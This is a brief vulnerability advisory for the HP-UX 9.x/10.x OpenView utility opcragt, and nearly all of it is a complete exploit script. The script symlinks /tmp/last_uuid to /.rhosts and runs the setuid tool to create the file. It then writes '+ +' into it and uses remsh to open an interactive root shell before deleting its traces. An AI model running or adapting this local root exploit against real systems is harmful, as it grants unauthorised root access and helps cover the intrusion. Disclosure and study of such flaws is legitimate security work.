COMMAND

    /opt/OV/bin/OpC/opcragt

SYSTEMS AFFECTED

    HP 9.x, 10.x

PROBLEM

    Script below shows how to make .rhosts if there is no any.

        #!/bin/ksh
        #
        # opchack (C) 1996 Dog Catcher
        # if /.rhosts does not exist then this will create one and
        # plop a nice little + + inside

        rm -f /tmp/last_uuid
        ln -s /.rhosts /tmp/last_uuid
        /opt/OV/bin/OpC/opcragt `uname -n`

        echo '+ +' > /.rhosts

        remsh `uname -n` -l root ksh -i

        remsh `uname -n` -l root rm -f /.rhosts
        rm /tmp/last_uuid